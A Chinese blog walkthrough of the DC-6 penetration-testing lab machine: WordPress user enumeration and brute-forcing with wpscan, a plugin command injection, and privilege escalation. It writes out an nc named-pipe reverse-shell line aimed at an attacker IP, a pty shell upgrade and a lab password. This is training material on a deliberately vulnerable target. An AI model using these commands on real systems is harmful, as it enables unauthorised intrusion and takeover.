DC-6

最新推荐文章于 2023-02-28 11:38:09 发布
最新推荐文章于 2023-02-28 11:38:09 发布
阅读量639 收藏 2
点赞数 2
分类专栏: 靶机实战——DC系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/102136387
版权

下载地址:http://www.five86.com/dc-6.html
1、发现目标主机192.168.168.201

在这里插入图片描述

2、目标主机详细信息

在这里插入图片描述
80、22端口开放

3、浏览器访问一下80端口

访问IP不成功,可以尝试访问一下域名
在这里插入图片描述
/etc/hosts添加解析记录
在这里插入图片描述
发现插件是WordPress,与DC-2靶机类似
在这里插入图片描述

4、wpscan扫描用户

wpscan --url http://wordy/ --enumerate u

在这里插入图片描述
将5个用户名保存到用户名字典里

5、wpscan暴力破解后台用户名、密码

为了缩短爆破时间,根据提示生成密码字典
在这里插入图片描述
在这里插入图片描述
如果爆破不出来,可以更新一下wpscan
apt-get upgrade wpscan 更新指定软件,wpscan可以为任意软件名
在这里插入图片描述

6、dirbuster扫出后台登录页面,登后台

使用kali自带的dirbuster扫描敏感目录
在这里插入图片描述
扫到后台登录页面,使用账号、密码登录
在这里插入图片描述
在这里插入图片描述

7、searchsploit搜索一下漏洞,发现存在命令注入漏洞

在这里插入图片描述

8、验证漏洞,抓个包看一下

在这里插入图片描述
改包,使用浏览器访问,查看用户身份
在这里插入图片描述
在这里插入图片描述
命令执行漏洞确实存在,并且返回当前用户信息www-data

9、开启监听,写入反弹shell

在这里插入图片描述
成功获取shell
在这里插入图片描述

10、开启一个交互式界面

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

11、提权之再次信息收集

试着查看用户mark的一些信息
在这里插入图片描述
发现有一条创建用户的信息,拿到用户名graham,密码GSo7isUM1D4

12、ssh登录graham用户

在这里插入图片描述

13、提权

先考虑sudo提权
在这里插入图片描述
发现一个不需要密码的脚本
写入echo 'rm -rf /tmp/p;mknod /tmp/p p; /bin/bash 0</tmp/p | nc 192.168.168.194 6666 >/tmp/p' >> backups.sh
在这里插入图片描述
在这里插入图片描述
开启端口监听
在这里插入图片描述
发现还是普通用户
继续提权在这里插入图片描述
发现nmap命令是root权限,不需要密码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功获取root权限

per_se_veran_ce
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-6 渗透测试
Darklord.W
04-14 1855
DC-6渗透测试 0x00实验环境 靶机:DC-6,IP地址:192.168.8.141 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web端 考虑需要添加hosts记录 正常访问 Wpscan扫描站点 wpscan --url...
DC系列:6 (DC-6靶机渗透测试详细步骤)
jrdh的博客
12-13 3266
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这不是一个过于困难的挑战,所以应该非常适合初学者。 此挑战的最终目标是获得 root 权限并读取唯一的标志。
DC靶机系列:DC-6
Ays.Ie的博客
02-28 577
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC-6靶机
weixin_45778886的博客
03-21 4133
环境搭建 下载链接:http://www.five86.com/downloads/DC-6.zip 解压用VMware打开
靶机渗透测试实战(六)——DC-6
weixin_45116657的博客
10-12 1184
实验环境: 目标机(DC-6)的IP:192.168.85.132 攻击机kali的IP:192.168.85.130 实验步骤: 1、IP探测、扫描 因为知道目标的ip,所以就不行探测了,我们直接进行ip的端口扫描,我们这里用的是nmap扫描。 命令:nmap -sV -p- 192.168.85.132 #-sV: 指定让Nmap进行版本侦测,或者扫描服务端口、名称和版本 2、通过Fi...
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
DC-DC PCB layout 指导.docx
06-18
6. 在设计 DC-DC PCB 布局时,需要将输入输出电容的 GND 用铜皮进行连接,摆件时两者的地尽量放一起。这样可以减少噪声和干扰,提高 DC-DC 的性能。 7. DC-DC Ton 和 Toff 时的电流路径都应该很短,减少阻抗和寄生...
Hittite HMC792LP4E DC-6 GHz数字衰减方案.pdf
09-05
Hittite 公司的HMC792LP4E是 DC - 6 GHz 6位数字衰减器,增量 0.25 dB LSB,最大衰减到15.75dB,IP3输出高达 55dBm,2.0GHz的插入损
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
6-A DC-DC Buck Converter Selection Guide of Mid-range.pdf
10-30
DC-DC降压转换器选择指南 DC-DC降压转换器是一种常用的电源管理器件,能够将高电压降低到低电压...本应用笔记旨在帮助用户更好地选择TI的DC-DC降压转换器产品,以满足中等输入电压和6 A输出步骤降压DC-DC应用的需求。
DC系列(6)DC-6靶机渗透
Nikris的博客
01-12 3650
DC6
Dc-6靶机实验
weixin_52263461的博客
03-17 403
靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 虚拟机软件 DC-6靶机IP地址:192.168.62.136 Kali的IP地址:192.168.62.135 使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136 使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http) 浏览器地址栏输入靶机IP地址,发现显示域名但无法
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1913
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-6靶机练习
SYJ_361的博客
03-27 3610
本文是对DC-6靶机的练习,利用kali通过网址信息暴力破解用户名,并登录wordpress,并在kali中找到对应的攻击模块,并进行远程登录,然后再对靶机进行提权
渗透测试:DC-6靶机
Ciyaso的博客
08-21 288
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
Vulnhub | DC: 6 |【实战】
bin789456的博客
07-15 834
Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
DC-6 步骤
底层社会中的弱智
09-21 339
目标IP 192.168.43.55 使用wpscan进行扫描 扫描的目标为用户和危险插件 过期插件 用户名 先对用户名进行爆破 来自作者的提醒 登陆 搜索已知的漏洞利用 下载利用 本地使用nc接收 提权 可以不使用密码执行backup.sh 可以直接获得jens的bash权限 在提权 nmap提权 TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF su
DC-6靶机实战
qq_43462485的博客
10-30 469
DC-6靶机实战 攻击机:kali 192.168.80.130 目标机: dc-6 192.168.80.129 一、信息收集 1.使用arp-scan -l进行主机发现然后使用nmap扫描端口信息 2.访问网站发现无法解析域名,构建一个curl测试访问,发现域名是wordy添加一下 3.访问成功后发现是典型的wordpress网站,使用wpscan扫描一下 发现了几个用户名 4.使用cewl生成字典爆破失败,查看官网提示https://www.vulnhub.com/en
DC-6靶机渗透
m0_62008601的博客
05-31 558
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值